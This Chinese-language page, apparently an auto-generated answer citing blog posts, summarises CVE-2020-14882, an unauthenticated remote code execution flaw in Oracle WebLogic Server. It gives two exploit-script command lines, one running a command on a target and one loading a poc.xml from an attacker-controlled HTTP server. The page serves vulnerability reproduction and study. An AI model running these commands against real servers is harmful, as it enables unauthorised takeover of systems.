CVE-2020-14882
时间: 2023-09-14 08:11:09 浏览: 174
CVE-2020-14882是一种存在于Oracle WebLogic Server中的漏洞。通过构造特殊的HTTP请求,攻击者可以在未经身份验证的情况下接管WebLogic Server Console,并执行任意代码。攻击者可以利用这个漏洞来执行命令或者控制服务器。在攻击机中执行命令"python CVE-2020-14882_ALL.py -u http://192.168.248.183:7001 -c "ls""可以对靶机进行攻击,其中靶机的IP和端口需要替换为具体的值。另外,在攻击机中执行命令"python3 CVE-2020-14882_ALL.py -u http://target_mechine_ip:7001/ -x http://your_httpserver_ip:8000/poc.xml"可以利用这个漏洞进行权限绕过攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
- *1* *2* [weblogic未授权访问漏洞复现(CVE-2020-14882)](https://blog.csdn.net/qq_32731075/article/details/117673410)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"]
- *3* [WebLogic未授权命令执行漏洞(CVE-2020-14882-14883)](https://blog.csdn.net/m0_48520508/article/details/109592136)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]
阅读全文